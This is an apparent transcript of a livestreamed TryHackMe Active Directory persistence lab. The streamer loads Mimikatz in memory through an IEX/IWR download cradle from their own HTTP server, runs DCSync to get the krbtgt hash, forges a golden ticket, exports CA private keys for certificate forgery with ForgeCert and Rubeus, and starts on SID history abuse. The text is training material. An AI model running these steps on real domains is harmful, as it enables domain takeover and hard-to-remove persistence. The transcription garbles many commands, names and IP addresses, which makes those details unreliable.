So welcome back. We're going to do Persisting AD, the last network in the series. Just like I was just saying on stream, like real quick, I don't understand why they don't have lateral movement and pivoting in here, because that was definitely one of the networks that came out. 4 people have already tried to reset it. There was 3 there. I clicked reset. I didn't know if there was a problem with it or what, but 3 other people tried to reset it. I'm going to go with maybe there's a problem. All right, we configured our DNS and everything right, so we are good. So this is a continuation of the network, so we've already gone through the whole thing, right? Pretty much. We do need our credentials. So let's go back here and get our credentials, and then we can SSH in as that person, hopefully. That's what our goal is going to be here. Thank God we're done with that. All right, so we can get the credentials, and we are going to be Chloe Potter with a password of Marissa 2014. All right. Not Clarissa, but Marissa. Let's go ahead and echo Marissa, right? M-A-R-I-S-A. 2014 into userpass.txt. And let's go ahead and get into this network now. We can SSH in with our credentials that we just received. Right, so we're going to get Chloe.Potter. And we'll grab that Marissa 2014 password. Yes. Let's go and grab this. And let's see when we very first get in here. I feel like I should be an administrator already, because we already got through the network. All right, that's a good sign already. All right, there we go. Okay, cool. So we are in. So let's do a whoami/priv real quick. Okay, I'm nobody. Whoami/groups. So it looks like we may have to... Yeah, it definitely look like we're going to have to increase our privileges here again. So persistence through credentials. All right, cool. So together with low privilege... Okay, so they actually tell me to go in as administrator. You'll use privileged credentials. Okay, because I'll say, if we're already doing persistence, we should already be up there. So I feel like there's no point in being Chloe right now. Let's go ahead and do that same exact thing as administrator. And we'll grab this password right here, and I'll throw that into... Let's see if he can SSH first. I'll throw that. So let's do a echo administrator into userpass.txt. All right, now who am I/priv? Cool. I am an administrator now, right? So very first thing with persistence, quick, easy day, net user Ryan password 1/add. We may be able to do a /domain if we can. We can try that. Yep, cool. Net local group administrators /add Ryan. Ryan's now an administrator. We could also do a net groups or group net group. I should be able to do that. I should be able to look at the domain groups. Okay. We'll work on that later. Should be able to look at the domain groups though. Might have to just upload PowerView or some of that. I know how to do it in PowerView. But so the very first thing we're going to do, it looks like we're going to upload Mimikatz. We are not going to upload this Mimikatz. We're not going to upload the executable. All right. We don't want anything on disk, right? So let's go ahead and do a locate invoke Mimikatz. And we're going to grab one of these, okay? And let me go ahead and go into PowerShell in here. And I'm also wondering, I want to also look at this user and see if they have remote management on. So whoami/groups. Or it might be, yeah. If we have remote management users, then we can just get in through evil WinRM. Or WinRM, either way. We can make a session. Remote desktop, authenticated, domain admins. Okay. So no, we don't have any type of remote management. I wonder if I can actually add them. Or I wonder if they actually exist on there. Let's go ahead and do an nmap TACP 5985. Let's see what IP address we're at right now. We are on 10.293.248. And we'll see if that port is even open. And it's filtered, so we can't get on WinRM like right now. So we can't create a session. That's okay. Let's go ahead and do a... So we already have Mimikatz sitting over here now, right? Nope, I do not. So locate, invoke Mimikatz. We'll grab one of these guys, right? We'll copy him over to here. And then we'll do a... let me cat him like real quick. Make sure he's not just going to run. He's not. Okay, cool. So let's go ahead and do a Python 3 HTTP server. And up here, we will do an IEX, IWR, use basic parsing. Use basic parsing, HTTP. My IP address for this is, I have no idea because we're in a network now. So I have config 1050.92.9 / invoke Mimikatz .ps1. Whoop. .ps1. Oh, that. There you go. Okay, so we'll see if we need to do an AMSI bypass or not. If so, I'll get that ready to go. Scripts, AMSI bypass. When we do not. So we now have Mimikatz in memory, right? So on this PowerShell instance, Mimikatz will run. If we were to SSH into another one, Mimikatz will not run anymore. It won't be there. We have to do that all over again, okay? Hey, thanks a lot for the follow cold combo. All right, so right now, Mimikatz will run on here. So we can do an invoke Mimikatz. Attack dump creds. All right. We do something like that, and we can dump all the credentials, right? I believe it wants us to do a DC sync attack on here. It does. So what we're going to be trying to do is grab, I believe, the Kerberos Tigran ticket. They want us to actually do it on the username test. Okay. What is the command to perform a DC sync for the username of test on that? All right. I always have to type these ones out. Or else as I start typing, I get lost over in the try-hack-me thing over there. So to be able to do that, we would do an LSA dump DC sync, right? / domain, and then the domain, right? Which would be za.tryhackme.loc / user. It should just be user, I believe. Yep, / user, and they want us to do it on test. So that would be the command to be able to run from Mimikatz onto there. Now that's from mimikatz.exe, right? What's the NTLM hash associated with the KRB TGT account? Like I said, most likely going to try to get that guy. So we can scroll up and see if KRB TGT is on here. With that dump all, with that dump creds like right there. And I'm not seeing them anywhere. We do see THM work the actual system itself, which you can use a system to move across. Right? You can use a computer, right? All right, cool comment. Yeah, thank you very much. Thank you very much. All right, so you can use computer to move across a domain if it is allowed, if they pretty much messed up in the domain, if they messed up how they built their Active Directory network. But just because it's a computer, don't think like, oh, I can't use that. All right. If a computer has delegation properties to it, like MSDS, stuff like that, delegation, you can use a computer system, and that's your user is the computer, right? So my user would be THM work1, right? WRK1. Ah! That was a backwards. All right, so the world has gone black. Oh no, everything's dark. All right, but we could do that and actually pass off that computer across. How long have you been doing pen test game? Actually, I've never actually done a real pen test. Try hack me stuff like that. Probably about 2 years now. So I'm a network. I do networking. All right. So now what we can do is we can try to look for that KRB TGT hash with a DC sync attack, right? So we're gonna do a /all, which also I've never actually seen it not dump it. So let's go ahead and hey, thanks a lot for the follow. Inom14T030. Inom. All right, so we can do an invoke Mimikatz, right? Attack command. Because I want to find the KRB TGT hash first. LSA dump LSA /patch. Now you notice that if we were to put in the executable, we would just type in this, right? So everything that's on the executable you can do on invoke mimikatz. You're just going to put in invoke mimikatz attack command, and then whatever it is from there, okay? We can also continue on and do more stuff. So we can do that. We can say LSA dump. Let me put some more quotation marks around this. So we can run more than one command at a time. So we could do a privilege debug, you know, and update our privileges, all that stuff, upgrade our privileges, everything. We could do all that. So from here we can do an LSA dump, LSA. Okay, we could do a vault. See if anything's running the vault. Cred /patch. We can do that with just regular vault cred. And we can just keep this command going and going and going and going and going, right? We're going to get a pretty big output like right here. So, but what I'm really focused on, that LSA dump, LSA patch. That's what I'm really focused on. So if we scroll up, hopefully we find the KRB TGT hash in the LSA dump. If not, we can still do a DC sync and grab that. And I'm not seeing the KRB TGT hash. Usually you find it in the system, then you go from there. But that's okay. We are an administrator, so we can pull it from the domain controller. So what we're going to do now is we're going to try to pull it from the domain. All right. So we're going to do an LSA dump. Okay. We can actually add it in there if we want to. LSA dump DC sync. And we're going to pull this from the domain controller /domain. And the domain is za.tryhackme. za.tryhackme.loc. Alright, we can try that. That's not going to work. Sorry. There, ending quotes. Alright, so the domain will be domain controller server, missing user or get UID argument. So let's do a /all. Or we can just do a KRB TGT since that's what we're looking for. That's the one that we really want. It's the KRB TGT. But you can also do a /all. Oh, really now? Okay. Should be a, we'll try /all and see what we get with that. Oh, you know what else? No, I didn't mess up. Never mind. Thought I messed up something. I don't mess up. Mess up all the time, actually. So we can see a lot of crap, right? This is everybody, right? Every single person is going to drop down in here, right? We're going to see every single person because we are going to the domain controller. Domain controller holds everyone in there. There's me. Actually, the guy I just created, right? So let's go ahead and, now obviously if I want to blend in more, I would do like first dot last, you know, kind of like how their kind of stuff is. I would want to do it like that. I would want to make any tickets that I make to add up to what they have. So here's the KRB TGT hash. We want to save that. So we're going to go ahead and make, usually whenever I'm on Windows, I just open up Notepad like real quick. Whenever I'm doing this in PowerShell. But since we're on Kali, we'll just go ahead and we'll just do a echo. And we'll say KRB TGT. KRB TGT, KRB TGT, there we go, Kerberos ticket grain ticket, and we'll throw that into user pass.txt. We'll throw it in there. We're also, actually, do we need the SID? Because we're not doing a cross-forest attacks, right? I'm going to grab the SID, even though we're not doing any cross-forest attacks. I don't think we're going to need it, but I'm going to grab it anyways. So now, whenever you do a cross-force attack, something you might have to do is get rid of the 502, like right here, just so you guys know. All right, so let's echo that into user pass.txt also. Yeah, whenever you're doing cross-forest, I believe it's your forest, you get rid of the SID. The one that you're trying to move into, you keep the SID, the last three there, and it's called a SIDS, SIDS. And that's with Rubius, I want to say. We've done that before with Rubius. Are you using Tmux? No, I'm using Terminator. All right, so we have that hash now, right? Let's go and grab that hash because we can answer that question now. And now we're most likely going to do is we're most likely going to pretend to be the KRBTGT. So we have persistence through tickets, okay? We do need the SID. Good thing I took that, huh? We're going to say ID of 500 because that's the administrator's place, right? We're going to do a Kerberos golden ticket attack, all right? That's what we're doing here. And now, just so you guys know, whenever you do this on Mimikatz, Kerberos golden, you can also do Kerberos golden, and that can also be a silver ticket attack, okay? But we're going to say /admin. It's not going to be real. We don't care, okay? Don't care who it is. You can make whatever account you want. Domain. ID is going to be 500. That's going to put them in the admin group. And I think you should actually do /user like right here also. I'm going to try with /user first. I usually do that. The SID, the Kerberos Ticket ticket. You see how they have this end in renew max? You don't technically have to do that. All right. But you could, if you really want to be quiet, what you can do is you can actually look up when the tickets end and when they can and how long they can be maxed for. You can actually look that up. And then you can make yours blend in with theirs, right? So then if they look through it, they don't see this random one that's going to last 7 days if theirs only lasts 1 day, right? So you can make yours look like their tickets. So let's go ahead and do an invoke Mimikatz. Attack command. We're going to do a Kerberos golden, right? Because we're doing a golden ticket attack, right? I'm going to do /user. And we're just going to say blah, okay? /domain. We're going to do za.tryhackme.loc. All right. /ID. It's going to be 500, right? Because that would be the group that we're going into. Okay. We see our group, you know, see how these guys are all 1,000, stuff like that. Most users are just like 1,000 stuff. If we go up to an administrator, we see that they're falling into group 500s. So 5XX, 5XX, things like that, right? KRBTGT is SID. He's in group 502. So we want to put this group into 500 because that would be the administrator's group. So that's what we're doing, like right there. All right. So ID 500 /SID. And we're going to do it for that computer system. Right. I don't remember if we need the 502 on the end or not. We'll throw it in there for now. /KRBTGT. This should be the Kerberos ticket hash, which we have like right there. And I think that should be it. So they're all my notes on me like right now. And we'll just do that like right there. We don't need to worry about the rest of it for now. Let's do a /pass the ticket. All right, what's up? There's no silly stupid question, man. Well, no, I shouldn't say that. There are also silly stupid questions, but not in here is not. Could you give me a high-level overview of what Kerberos golden ticket attack is? What is it? What it does? All right, so you have your Kerberos golden ticket. You have your Kerberos ticket, right? And your Kerberos ticket system, right? TGT and TGS, right? Or server, figure which one it is. But TGT and TGS, right? So what we're doing is we are creating a ticket, okay, for a user that doesn't exist or does exist. You can say administrator, right? If you want to really fly underneath the radar. But we're creating a ticket. Now, how Kerberos works is it doesn't give a shit what's happening as long as your ticket meets, you have the proper ticket. So when it sends you a ticket, it gives you that proper ticket. So if you have a golden ticket, it's just like Willy Wonka. You can go anywhere you want, according to Kerberos. So when you go to move from one system into another one, it doesn't care about your username. It doesn't care about your password. It cares about your ticket. That's how Kerberos looks at it. So what we're going to do is we're going to use our ticket that we just created, like right here, right? We're going to use that because we have the Kerberos ticket hash. We can go anywhere we want because we have the top dog's hash. We have the guys controlling everything. We have his hash. We're like, hey, we are you. So it's like, oh, cool. You can move wherever you want. That's pretty much what Kerberos, the golden ticket does. It's just like, I always just think of it as Willy Wonka. I got a ticket, I can go anywhere I want. So we can create a session anywhere we want, which then creates persistence, because now we have a ticket, you can actually save that ticket into a file, and you can come back, and then immediately, then you can use that ticket. You can tell Mimikatz to, hey, pull that ticket back in. Kerberos is like, yep, you're good, because you have everything, right? That meets up to our standard, you're good, come on in. You can move between machines. So you are top dog administrator, and since you're top dog administrator, you can look at anyone else's account. Since we have other hashes now, because we're on domain controller, we could become a user if we wanted to. If we wanted to, we could become that person. But we're going to be an administrator, so we can just sit there and just look at everyone else's, on every other machine, what everyone else has. Pretty much. It won't be permanent because it does get recycled after so long. If I do a K-list like right now, we can see that ticket, that Kerberos Stingray ticket. I just made it. This one's only going to last for, I think it's, this one actually, I think whenever Kerberos makes it, it lasts for like 10 years or some crap like that, or maybe cats, if you don't change out the end in and renew max. If you don't change that out, then it'll last for like 10 years or some crap like that. But this like right here, yep, maybe cats that is valid for 10 years. But they just want you to make it last for 7 days on this one. Really what you would do, so it would last for the next 7 days. Mr. Extremely, I don't think so. I don't know that deep in the blue side. But I don't think there is with how Kerberos works. You could make it so that it's only a one-time ticket, but even with that one-time ticket, once they get it, they have it. Like, that's why it's so scary if someone gets into the domain controller, because now they have everything. And it's easily accessible, everything. But I don't know. If DZ64 is on, if he's here, he could probably answer that question. Alright, so we have our ticket now, right? We did our K-list. We have a ticket, obviously, right? So, I hope that answered you guys' questions. I don't know, Mr. Extreme. I don't know that one. But, yeah, Cold Combo. We just pulled that KRB TGT hash from the domain controller. That's what we just pulled from. So we can get into there if we want to. Because we're running as an administrator on this box as a domain admin. Which AD accounts NTLM hash is used to sign the Kerberos tickets? Which AD accounts, like KRB TGT? Okay. What's the name of the ticket that impersonates a legitimate ticket grant ticket? Golden ticket. That should be golden ticket. The next one is silver ticket. Silver tickets are actually more dangerous than golden tickets and quieter. So, because they impersonate the ticket granting system. Yep. Yes, Cold Combo. Exactly that. So you can move on to any machine, and since you're a domain admin, you can look at any file on that machine and do whatever you want on that machine, since you're a domain admin now. What's default lifetime in years? 10 years. Persistence through certificates. I've never... have I done this? Got Rubius. Yes, I have. Okay. So, Rubius.exe. This is a binary that you can download off of GitHub, whatever else. It's actually extremely, extremely powerful. Okay. I think we actually did this in either Wreath or Holo. We did a certificate. But Rubius is extremely powerful. Actually, I think one of the videos just came out. I did a Active Directory with PowerShell video. And we were hacking a Try Hack Me network. And we used Rubius a lot in it. Rubius is extremely, extremely powerful. Can do a bunch of stuff. There's a whole documentation on Rubius. If you look it up, Rubius executable GitHub. If you look up Rubius, there's a bunch of documentation stuff like that on it. Now, if you download it onto your local machine, it will get flagged. All right, so this is something, but usually by the time you get here, you might tear down the firewall by the time you get here. But yeah, you can download this guide. You can actually have the Rubius executable, send it over to the other machine, and just do it like that. And there's a whole bunch of stuff in here of what you can do. So it's an extremely powerful tool. I would highly suggest, if you've never used it before, I highly suggest just to, you use this guy, use this one, or build your own network and try to do some Rubius attacks, things like that. All right. So does it want us to go into another person? Because it has them and Aaron Jones like right now. So techniques from this point forward are incredibly invasive and hard to remove, even if you have a sign off on your red team to exercise. Before these techniques, you must take the utmost caution. Will result in a full domain rebuild, which means that if you're just doing this for freaking a test, don't do it. Real scenarios, exploration of most techniques on full domain rebuild. Make sure you fully understand the consequences of using these techniques and only perform them if you have a prior approval on your assessment and they are deemed necessary. In most cases, red team exercise would be dechained at this point instead of using these techniques, meaning you most likely not perform these persistent techniques, but rather simulate them. I guess during like purple team exercises, like remember the red team and blue team get together and you're on virtual machine, stuff like that. And you can quickly rebuild the domain controller with just a reset of it or something, This would be the time. But other than that, you're not going to be doing this crap on a actual live network. If you do, you're an asshole. The last two persistent techniques relied on credentials. While we can definitely make the blue team's life complicated, they can ultimately rotate enough credentials to kick us out. So there you go. So while these techniques are great to keep the blue team busy, while we keep them busy, we should look to use persistent techniques that are credential agnostic, meaning the rotation of these will not kick us out. The first of these we'll be looking at its certificates. Okay. So certificates last roughly 5 years. And we are going to extract a private key, it looks like. So the private key of the certificate authority is stored on the certificate authority server itself. The private key is not protected through hardware-based protection methods such as hardware service module, which is often the case for organizations that just use Active Directory services. Active Directory certificate services for internal purposes is protected by the Machine Data Protection DPAPI. This means we can use tools such as Mimikatz and Sharp DPAPI to extract the certificate authority certificate and thus the private key from the certificate authority. Mimikatz is the simplest tool to use, but if you want to experience the other tools, have a look here. Use SSH to authenticate to using the administrator credentials. We already did that. Create a unique directory for your user, move into it, and load Mimikatz. We're not going to load Mimikatz, but we will create a unique directory. So let's cd into the C drive, users, and we'll make directory caret. We'll cd into there. And there we go. Destroy network.exe. What's that? Alright. So we got that right. Boom, boom. Let's see if we can view the certificate stored on the domain controller. So we can use certificate. I never actually did this one before. I don't think. So let me throw that one into my notes like right there. Because that's pretty freaking cool. I think we just had their certificate already or something like that. Or they gave us a certificate or something like that already whenever we did this before. So let's go ahead and open file. I want to go to my notes. Active Directory, Mimikatz. And we're going to do a, this is for certificates. All right. And let me throw that into my main thing over here. There we go. Now we just did a past ticket. I might as well throw it in there. Because I just did it. So I might as well just throw that in there. Okay, cool. So let's go ahead and use the command to be able to extract certificates here, crypto certificates, system store, local machine. All right, so we're trying to go for the local machine. Oh, invoke Mimikatz. Let's see if we can do this with invoke Mimikatz. I don't know if we can. Invoke Mimikatz, that command. We'll do crypto. Probably just actually Control-Shift-V there. Paste all that in. Should be able to do this with invoke Mimikatz. We'll find out here in a second. Christy, you still here? Alright, so we did actually extract a ticket. Easy day. Let's go. Right? I kind of want to do this one over here. Okay. So from there, we extracted a ticket. Did we actually save it, or what do we do here? Let's see how we did this. Let's see what's next. We can see that there is a CH certificate. On DC, we can also note that some of these certificates were not set to allow us to export the key. Exportable key, no. Those are 100% facts. Hey, thanks a lot for the follow, Wello. Thank you very much. See, we're now allowed to export the key. So now it wants us to do a privilege debug, crypto CAPI, crypto CNG. Yeah, I've never done that one before. So let's just go ahead and we'll just throw that all into one command, maybe. Let's try that. Instead of doing multiple commands there, let's try to do a privilege debug. And it was crypto CAPI. Is that correct? CAPI, yep, then crypto CNG, okay. CAPI. And then crypto CNG. So I make sure I got everything right. Yep. CNG. Let's try that like right there. See if that works. See if we can do it without actually putting Mimikatz actually on the disk. Do it all in memory. Now it said it wants us to do this again. You know what? We're going to have to put all of that before this. We're going to have to do the privilege debug and everything like that beforehand. Let's try that. So let's go ahead and do another privilege debug. Because right now, if we were in the executable, we are good with privilege debug. Since we're doing it in memory through invoke Mimikatz, it just ran it this one time. It's not going to stay in there. So let's try that like right there. And then a crypto. We'll just throw it all in there again. Let's do that. Because now I'll run this whole thing as one big Mimikatz. Still not exportable. Should it say? Okay, it's still exportable. The export certificates will be stored in PFX and DER. Might have to actually put Mimikatz on here. It says that it's still not, he even gets still not exportable, no. Well, he does actually get some stuff down there now, doesn't he? Let's use the patch for you. With these services patch, we can use Mimikatz to export certificates. Okay, let's try to do it one more time. This time, I'm just going to try just to do... I feel like we should have exported it like that. But if not, we might have to actually put Mimikatz actually on the system. That means someone else did it before me. Okay, let's try this. If we do that, and then we just run just crypto certificates without all the other stuff in it, will that work? Okay, so it looks like we're going to have to actually put Mimikatz on this machine. Let's try that. Let's go ahead and look for wget Mimikatz. Whoopsie daisy. Locate. Mimikatz. I'm looking for .exe. go ahead and grab this over to here. Let's go ahead and do a wget HTTP, use basic parsing, HTTP, slash mimikatz.exe. Our file will be mimikatz.exe. Okay, no, usually you're chatting it up, and I was like, I'll make sure everything was okay, that's all. Didn't need to call 911 now. Maybe heard me from the kitchen. Hey! What are you doing? Privilege debug. Alright, we're good with that. Let's go ahead and do that. Crypto Cappy, then crypto CNG. Okay, that's okay, they said. And then we're going to dump this guy again. And we'll see if that works. No, he's still getting a no, but we'll see if it works. Okay, so we had to do it through there. Now I'm wondering how we can do this through invoke mimikatz. Okay, so all right, cool. All right, so we got that right. So we have now dumped this. So that's cool, right? Go ahead and take a print screen. That guy right there. This is one that I've never done it like this before. So this is cool. Learning this way is pretty cool. All right, let's exit out here. dir. And we have a PFX and a dir. Awesome. We're looking at that PFX one, though. That's what we care about. So now we have to do dir. Yep. Okay, so now we have generated our own certificates. Okay, so it looks like we want ctools forge certificate.exe. I'm going to go with that's a forge certificate executable GitHub. Can we do that? However, like using anything that's on the machine already. Because then that just means that, it's actually not in ctools, For certificate.exe. Let's see if we can find that executable file. Let's see in there. If we expand archive, that's not really going to give us too much now, is it? I want to get that file like right there. Let's try to find that file first, see if we can upload it. Where can we get that executable from? Does it actually tell us, like, you can get it from here? We can use Spectre Ops for certificate tool. Oh, that would have been way easier. We're in the same spot. I guess this code, download as a zip maybe. And then we'll bring it over there and unzip it. Try something like that. Save that. We will move from downloads force certificate to here, and then we will wget http 105092.9 / force certificate up to here. Attack out file will be that guy. Let's try this like right here. Expand archive. Force certificate main.zip. How do I actually build this on a Windows system? Let's see here. Let's see how to actually build this thing. How do we actually use this guy? Let's see, how to install. Like I was going to see tools, like it's just sitting on every single system in there, you know? Just 4 certificates on all these different systems. How would we install that? I'm going to CD and the tools, like real quick, see what they have in there. Force certificate. How'd you get that? And can I just take all that out of there and just pretend like that's good? Let's see here. I'll install SLN file on Windows. Can we just run that? We just run. Was that gonna be like, yo, you are way off, bro? Nothing's actually being installed yet. Okay, I have no idea how to actually install that file. To actually get force certificate executable. Usually you just find them. Get executable file. Seems like only couple people have actually, I feel like only one GitHub account, which is kind of weird too. It doesn't really explain how to. It's not even install even on here. That's weird. How do we actually get? Do we already have it? I wonder if we already have it. Okay, I'm done messing around with that. I have no idea. No idea how to actually install that file. So let's go ahead and, I guess we're going to send this guy, this PFX at the forge certificate. We'll have to figure that one out later or something. CA cert path is obviously going to be wherever we put it at, right? So if we do something like this, right? C tools forge certificate.exe. CA cert path obviously going to be in C users caret slash C users caret, right? I think. New cert path, yeah. Slash that local machine thing, right? I feel like that would be it, right? The path to our export CA certificate. Yeah, so we're going to have to put it to us. Right? So here's caret slash, and then this, like right here, this PFX file. Let's go ahead and do that. Cert, CA cert password is going to be Mimikatz. Alternate name is going to be administrator. New cert path, full admin PFX. New cert password, password 123. We enter on there. What's going to happen? Okay. So saved it in there. Let's go ahead and throw that over here. We got forge cert. From there, our next step we got to figure out how the hell to build it, I guess. Okay, from there, our next step is going to be to upload Rubius and utilize that, which we already have Rubius on this system also. We'll go ahead and we'll upload it into here. So locate Rubius.exe. They also have a PowerShell script for Rubius too. Let's go ahead and copy that guy to right here. And we will now do a wget http tag use basic parsing http slash Rubius, right? Tag out file will be Rubius.exe. All right, so there we go. There's that. So now we have Rubius on there. So now we can run Rubius. We're going to ask for a 10-grain ticket for the user administrator. AES-256 certificate, path certificate, password, certificate file, password, out file. So which path certificate though? Like the one that we already have or the one that we just made? Path certificate we have generated. Okay, so the one that we just made now. Okay, so we're going to do a quick. So that guy is sitting with us like right here, right? No, he's sitting in, is he? Full admin PFX. Full admin PFX. Okay, cool. So we can go ahead and let's run that Rubius command like real quick. So we're going to say Rubius.exe, boom, boom. Remember, we are not in command prompt, so we're going to do a period slash Rubius.exe. Ask for a 10-grain ticket for the user administrator. Encapsulation type is going to be AES 256. Certificate name is actually going to be admin, full admin PFX, right? Full admin PFX. Password is not try-hack-me. It's password 123. Remember we did that in the last one. Out file, administrator Kirby, that's fine. We need to make it a Kirby file so maybe cats can read it. Or Rubius, or Kiko, or anybody else. Domain, zada.tryacme.loc. Domain controller IP address. And we got to check out domain controller's IP address. They want 101, so we're probably looking at the CHM child DC, not the root DC. So we're looking at 93. .93.101. Let's see what happens. KDC error, client not trusted. You know why? Because we did make the user Mimikatz, didn't we? CA cert password Mimikatz. New cert password 123. Do we actually make a user on here? Administrator. Full admin PFX. You know, I've actually had this problem with Rubius before because I had an older version of it. So I'm wondering if that has something to do with it again. Let's go ahead and go into C users tools because I had an old version of it. So if I grab the old version of it, then we're kind of screwed. Let's see if that works. Oh, C tools, sorry. It's not user tools, C tools. Okay, so KDC error, client not trusted. For zada.tryacme.loc. Now we gotta think. Ask for a TGT, user administrator, calculation AES 256, full effects. Did you guys get yours to work? I feel like they should. Path certificate. Oh, you know what? I might need the full path. We might actually need the full path certificate. I've had that probably before also. With Rubius, where even if it's sitting in here, they want the full path. And then we're also going to do the full path for the out file too. It might be something like that. Let's go ahead and put in the full path for the out file. Let's try that like right there. Nope. Still not trusted. Really now. Did the box get reset? Nope. Let's see here. Let's look at the Rubius page here. Certificate. Rubius certificate. Boom, boom. He gives the full path. Hey, thanks a lot for the follow, Medieval Freak Show. User path / create only. Okay, now get credentials, service key, domain. We got that. This one has domain controller in it instead of just, yeah, DC. Okay, domain controller, DC. Certificate, retrieve a certificate from user's keystone. Where else can we get certificate at? Where else? Get rid of encapsulation type. Nope. The certificate. Password 123. That should be the password, right? Save force certificate full admin PFX with a password 123. Capital P ASSWZRD 123. Out file. C users administrator.kirby. Okay. Domain. za.tryhackme.local. Okay. 10.293.101. Is the certificate jacked up? Do we have to give an actual username? Okay. It's not going to work. That's strange because we just copy and pasted from what they had. It's kind of what I figured. Wouldn't matter which one I was in, but then paste the whole thing also. Administrator Kirby. Didn't grab that product right there. Nothing. Client error. Client not trusted. Do we have to go back through and do the whole thing again, or what's going on here? Users caret. Our full admin. We got our PFX, right? Let's go ahead and try to do that whole thing over again. Go back into PowerShell. Let's go back into here. And let's try to do this whole thing over again. Because that's extremely, extremely strange. Rubies.exe. C users or C tools. Let's use their tools for it. Because it might be, I might have given it an old version. Still not right, actually. That's still what we've been doing, like right there. Force certificate, password 123. Maybe that space was messed up, like right there. Nope, nothing. Oh, try hack me, you did it again. Your trading has done it again. Alright, so we're forcing to cert. CH certificate path. C user boom boom. PFX. CA cert password. Mimikatz. Subject. CN user. Subject alternate name. Administrator as tryhackme.loc. Do we have to do all of that? Or can we get rid of all of this? Like right here. Or with the next one, do we have to actually put in administrator as we did? No, domain. Administrator at Kirby. Where's the name at? User. Let's do administrator as tryhackme.loc. Be surprised if this changed anything, but we can try. It's really just telling it what domain it belongs to. Yep. That's kind of what I thought was going to happen. All right. Try-hack-me seems to have done it again. Let's go ahead and delete those certificates and we'll just get new certificates. How about that? We'll delete everything in here. Actually, let's do a keyless purge also, in case that's messing it up. Keyless? Wait, what? Oh, keyless. I was like, wait, what? Purge. Come on, stop going so slow. Oh my god, stop moving so slow. Keyless purge. There we go. Maybe that's messing it up. And let's go ahead and delete local machine. Delete local machine. And let's go ahead and upload Mimikatz again. Privilege. Debug. Should get 20. Okay, cool. We'll go ahead and do that Crypto C API again. Let's drop some more certificates again. And we'll go ahead and we'll drop these guys. Crypto CNG. And it shouldn't work. We should get an error because somebody else already did it. And crypto certificates to store local machine and export those. Okay. Now let's go ahead and export to store it in PFX DER format. Now let's try this next one again. Exit DIR. We have them again, like right there. Actually look bigger for some reason. Let's go and do that. And we are going to do the certificate path is actually going to be. Maybe we need to put in a full path like right here also. Let's do a full path. So we're going to do a C users caret slash this guy right here. Certificate password Mimikatz user subject alternate name administrator try-hack-me new cert path. Let's do C users caret user password 123. Okay, cool. Let's see what's next. So from here, let's go ahead and do our password 123. Right. What was the last time? Was the encryption type wrong last time on one of them? I forgot what the last one was too. 93. I remember though on using one of these things, the encryption type was incorrect. Certificate, which is the certificate that we just made, right? Certificate, patch certificate we have generated. Password for our certificate file. Okay, so that would have to be the full admin one. .pfx. Password is password 123. Our file is with us again. Caret in our folder, and we'll hit enter, and it'll fail. Failed to find the certificate this time. Oh, C users caret. That's okay. C users caret. Oh man. Oh boy, try hack me, you failed us again. I'll just move on to the next one. Oh boy. I should make it exactly what they have like right there, huh? Let's go with the root domain controller. 10.293.100. Let's try that. Nope. Oh, try hack me. You failed us again. Oh, Video Freak Show. Nothing's happening like right now. We just keep getting denied with the try hack, with an actual try hack me walkthrough, with a copy and paste from their own walkthrough. So I mean, you know, maybe the machine expired. Maybe it died. Seen that one happen before. Maybe that's why everyone else is trying to reset it. I've already voted for one, so I can't vote for another one. All right, let's just move on. We're just going to move on to something else, and we'll go back and we'll try that again. Persist through SID. All right. So what are we going to do here? Administrator credentials, next part. Before we forge SID history, let's first get some information regarding the SIDs. Firstly, let's make our low privilege user does currently have any information in their SID history. I don't remember what my low privilege user name was. Chloe. Get AD user. Should be Chloe.Potter. Oh, the box 5 froze. There it goes. I'll see, is that all she wrote? Okay. Property, sit history, member of. So there's our SID like right there for Chloe.Potter. Okay. This confirms that our user does not currently have any SID history. Let's get the SID of domain admins group. Okay, so we'll do the same exact thing, I guess. Get AD group. Domain admins. They do not have SID history also. Mimikatz to add SID history. However, the latest version of Mimikatz is the flaw. It does not allow it to patch LSAS to update SID history. Hence, we need to use something else. In this case, we will use DS internals tool to directly patch the ntds.dit file, the AD database where all the information is stored. Huh, okay. Need to go back to command prompt here to stop that. Actually, we need to go back into PowerShell with that command. We need to stop it because it won't give us the correct information, like the backup or whatever. Google it? Oh, nice. What box was it? We can go in there and do it like real quick. What box was it? So what is the SID history going to do for us? So I don't understand like right now. What is this actually going to do? Why would we care to add an SID history? T. I rebuilt the entire CA just to see that the attacker is still performing DA commands with a low privilege count. This will not be a great day. Oh, okay, so we're pretending to be somebody else pretty much. With our SID, we're pretending to be a low privilege account, but really we're an administrator. So whenever they go to look at it, it doesn't look weird because they're kicking out the administrator's account, but alright, I think this box is actually jacked up like right now. It's called new box. I think this one might be jacked like right now. I think someone jacked it up. Network is resetting. Let's go! Alright, let's reset the network. I think this thing might be jacked because the NTDS service doesn't exist anymore. And that should 100% exist, so. Let's go ahead and we'll give this box a minute to start up. I'm going to take a quick 5-minute break since we're going to get this box a minute to start up. For some reason, reset's still at 4 out of 5. It should have actually just reset. It just said box is resetting. So, okay, network stage resetting. I'm gonna take a quick 5-minute break, let this box reset, and then we'll get back on them after that. Here, like a little bit. Beginner path, that's something you have to pay for. I don't know, maybe I started paying for it a while ago, but yeah, I did it for like a year and a half for free. And I don't know, they may have put more stuff paid for on there or whatever. But what sucks is that it's actually the people that actually put it on there that have it be paid for, just so you know. Like you pick if you want it free or paid for. Let's try to do this guy one more time. Real quick here. What's up, Ryan is noob? Or nub? Huh, my fault. Let's see, let's do an NS lookup. Okay, cool, we got the password. I don't remember what the hell the administrator's password was. Try Acme. Would not guess one at. Okay, so we're in. Alright, so we are in here again. Let's go back into PowerShell. And let's try to get this guy up and running again. All of our stuff should be gone if we CD into users. Let's make a directory for Carrot. CD into there. Upload Mimikatz. Use basic parsing. HTTP. I don't know what the hell my IP address is. This is a network box. Different IP address. / mimikatz.exe. Our file will be mimikatz. Huh? I hate whenever it goes slow. .exe. Let's go and get that back in there. Let's go ahead and we'll just use their Rubius because I know that Rubius, one of mine is messed up. You run the machine via the website, but they connect to it from your own machine. No, you can't download the box. Yeah, you can't download any boxes. Alright, so let's go ahead and get Mimikatz up and running again. And we'll do all the commands again for this guy. I'm just going to copy and paste them all this time. Privilege GUI, crypto CAPI. Crypto CNG, right? And then we'll throw this guy in there. Somebody already ran it, looks like. Okay, we exported them, so now we have some more tickets in there. Cool. At least our KList has been purged now also. Go ahead and do an exit. Let's do a KList to make sure it's actually been purged. And, oh, that's because we are administrator, that's why. Okay, we're good with that. All right. Let's go ahead and do a DIR. We should have some PFX tickets in there. And we do. Okay, cool. Go and copy that name. And now we're going to, should have copied it yet? Because we have to go to 